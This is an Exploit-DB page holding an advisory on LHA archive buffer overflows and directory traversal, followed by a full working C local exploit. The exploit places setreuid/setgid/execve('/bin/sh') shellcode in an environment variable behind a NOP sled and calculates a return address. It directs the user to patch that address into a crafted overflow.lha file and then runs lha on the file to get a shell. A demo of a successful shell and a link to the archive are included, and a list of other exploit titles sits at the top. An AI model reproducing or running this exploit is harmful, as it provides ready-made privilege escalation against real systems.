
1979 changes to exploits/shellcodes Couchdb 1.5.0 - 'uuids' Denial of Service Apache CouchDB 1.5.0 - 'uuids' Denial of Service Beyond Remote 2.2.5.3 - Denial of Service (PoC) udisks2 2.8.0 - Denial of Service (PoC) Termite 3.4 - Denial of Service (PoC) SoftX FTP Client 3.3 - Denial of Service (PoC) Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection Silverstripe CMS 3.0.2 - Multiple Vulnerabilities SilverStripe CMS 3.0.2 - Multiple Vulnerabilities Silverstripe CMS 2.4 - File Renaming Security Bypass SilverStripe CMS 2.4 - File Renaming Security Bypass Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload Silverstripe CMS 2.4.x - 'BackURL' Open Redirection SilverStripe CMS 2.4.x - 'BackURL' Open Redirection Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure Silverstripe CMS - Multiple HTML Injection Vulnerabilities SilverStripe CMS - Multiple HTML Injection Vulnerabilities Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation Monstra CMS before 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (2) Monstra CMS < 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (1) Navigate CMS 2.8 - Cross-Site Scripting Collectric CMU 1.0 - 'lang' SQL injection Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection LG SuperSign EZ CMS 2.5 - Remote Code Execution MyBB Visual Editor 1.8.18 - Cross-Site Scripting Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection RICOH Aficio MP 301 Printer - Cross-Site Scripting Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection RICOH MP C6003 Printer - Cross-Site Scripting Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes) Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
162 lines
No EOL
6.6 KiB
C
162 lines
No EOL
6.6 KiB
C
source: http://www.securityfocus.com/bid/10243/info
|
||
|
||
LHA has been reported prone to multiple vulnerabilities that may allow a malicious archive to execute arbitrary code or corrupt arbitrary files when the archive is operated on.
|
||
|
||
The first issues reported have been assigned the CVE candidate identifier (CAN-2004-0234). LHA is reported prone to two stack-based buffer-overflow vulnerabilities. An attacker may exploit these vulnerabilities to execute supplied instructions with the privileges of the user who invoked the affected LHA utility.
|
||
|
||
The second set of issues has been assigned CVE candidate identifier (CAN-2004-0235). In addition to the buffer-overflow vulnerabilities that were reported, LHA has been reported prone to several directory-traversal issues. An attacker may likely exploit these directory-traversal vulnerabilities to corrupt/overwrite files in the context of the user who is running the affected LHA utility.
|
||
|
||
**NOTE: Reportedly, this issue may also cause a denial-of-service condition in the ClearSwift MAILsweeper products due to code dependency.
|
||
|
||
**Update: Many F-Secure Anti-Virus products are also reported prone to the buffer-overflow vulnerability.
|
||
|
||
/* Author : N4rK07IX narkotix@linuxmail.org
|
||
|
||
Bug Found By : Ulf Ha"rnhammar <Ulf.Harnhammar.9485@student.uu.se>
|
||
|
||
LHa buffer overflows and directory traversal problems
|
||
|
||
|
||
PROGRAM: LHa (Unix version)
|
||
VENDOR: various people
|
||
VULNERABLE VERSIONS: 1.14d to 1.14i // Theze sectionz completely taken from full-disclosure :))
|
||
1.17 (Linux binary)
|
||
possibly others
|
||
IMMUNE VERSIONS: 1.14i with my patch applied
|
||
1.14h with my patch applied
|
||
|
||
Patch : Ulf Ha"rnhammar made some patch U can find it on :
|
||
LHa 1.14: http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm
|
||
http://www2m.biglobe.ne.jp/~dolphin/lha/prog/
|
||
LHa 1.17: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/
|
||
|
||
|
||
---------------------------------------------------------------
|
||
|
||
Little Explanation about Exploit : Copy the attached overflow.lha file to your directory , i.e /home
|
||
Then open overflow.lha with text editor(vim is better), U will see there four bytes XXXX at the end of the line, just
|
||
delete XXXX and paste your ASCII RET address there,but make sure not to malform the file.Then run the sploit.
|
||
|
||
Note : overflow.lha file is completely taken from Ulf's post.
|
||
|
||
Demo:
|
||
|
||
addicted@labs:~/c-hell$ ./lha /home/addicted/overflow.lha
|
||
--------------------------------------------------
|
||
| Author : N4rK07IX
|
||
| Vim 6.x Local Xpl0it
|
||
| narkotix@linuxmail.org
|
||
|--------------------------------------------------
|
||
[+] RET ADDRESS = 0xbffffd90
|
||
[!] Paste These ASCII 4 bytes Ret Adress to the XXXX in the file overflow.lha
|
||
[!] ASCII RET ADDR = <20><><EFBFBD><EFBFBD>
|
||
[+] Exploiting the buffer..
|
||
LHa: Error: Unknown information
|
||
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUAAAAAAA<EFBFBD><EFBFBD><EFBFBD><EFBFBD>B
|
||
sh-2.05b$
|
||
|
||
Gretingz: Efnet,mathmonkey,Uz4yh4N,laplace_ex,xmlguy,gotcha,forkbomb
|
||
|
||
*/
|
||
|
||
#include <stdio.h>
|
||
#include <string.h>
|
||
#include <unistd.h>
|
||
|
||
#define BUFFERSIZE 2000
|
||
#define FEED 600
|
||
#define PATH "/usr/bin/lha"
|
||
#define PROG "lha"
|
||
|
||
static char shellcode[] =
|
||
|
||
//* setreuid(0,0);
|
||
"\x31\xc0" // xor %eax,%eax
|
||
"\x31\xdb" // xor %ebx,%ebx
|
||
"\x31\xc9" // xor %ecx,%ecx
|
||
"\xb0\x46" // mov $0x46,%al
|
||
"\xcd\x80" // int $0x80
|
||
|
||
/* setgid(0); */
|
||
"\x31\xdb" // xor %ebx,%ebx
|
||
"\x89\xd8" // mov %ebx,%eax
|
||
"\xb0\x2e" // mov $0x2e,%al
|
||
"\xcd\x80" // int $0x80
|
||
|
||
// execve /bin/sh
|
||
"\x31\xc0" // xor %eax,%eax
|
||
"\x50" // push %eax
|
||
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
|
||
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
|
||
"\x89\xe3" // mov %esp,%ebx
|
||
"\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx
|
||
"\x50" // push %eax
|
||
"\x53" // push %ebx
|
||
"\x8d\x0c\x24" // lea (%esp,1),%ecx
|
||
"\xb0\x0b" // mov $0xb,%al
|
||
"\xcd\x80" // int $0x80
|
||
|
||
// exit();
|
||
"\x31\xc0" // xor %eax,%eax
|
||
"\xb0\x01" // mov $0x1,%al
|
||
"\xcd\x80"; // int $0x80
|
||
|
||
|
||
int main(int argc, char *argv[])
|
||
|
||
{
|
||
if( argc < 2 )
|
||
{ printf("[-] Enter The Full Of the overflow.lha \n");
|
||
exit(-1);
|
||
}
|
||
|
||
|
||
|
||
printf("--------------------------------------------------\n");
|
||
printf("| Author : N4rK07IX\n");
|
||
printf("| Found by : Ulf Ha'rnhammar\n");
|
||
printf("| LHa 1.14d 1.14i 1.17 Local Lame Stack Overflow Sploit\n");
|
||
printf("| narkotix@linuxmail.org\n");
|
||
printf("|--------------------------------------------------\n");
|
||
|
||
char buffer[BUFFERSIZE];
|
||
char addict[FEED];
|
||
|
||
int i,
|
||
*adr_pointer,
|
||
*addict_pointer;
|
||
|
||
memset(addict,0x90,sizeof(addict));
|
||
memcpy(&addict[FEED-strlen(shellcode)],shellcode,strlen(shellcode));
|
||
memcpy(addict,"ADDICT=",7);
|
||
putenv(addict);
|
||
|
||
unsigned long ret = 0XBFFFFFFA -strlen("/usr/bin/lha") - strlen(addict);
|
||
printf("[+] RET ADDRESS = 0x%x\n",ret);
|
||
|
||
char l = (ret & 0x000000ff);
|
||
char a = (ret & 0x0000ff00) >> 8;
|
||
char m = (ret & 0x00ff0000) >> 16;
|
||
char e = (ret & 0xff000000) >> 24;
|
||
|
||
|
||
|
||
|
||
|
||
printf("[!] Paste These ASCII 4 bytes Ret Adress to the XXXX in the file overflow.lha\n");
|
||
printf("[!] ASCII RET ADDR = %c%c%c%c\n",l,a,m,e);
|
||
printf("[+] Exploiting the buffer..\n");
|
||
adr_pointer = (int *)(buffer);
|
||
|
||
for(i = 0 ; i < BUFFERSIZE ; i += 4)
|
||
*adr_pointer++ = ret;
|
||
execl(PATH,PROG,"x",argv[1],NULL);
|
||
if(!execl);
|
||
perror("execl()");
|
||
printf("[+] Done B4by\n");
|
||
|
||
return 0;
|
||
}
|
||
|
||
|
||
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24067.lha
|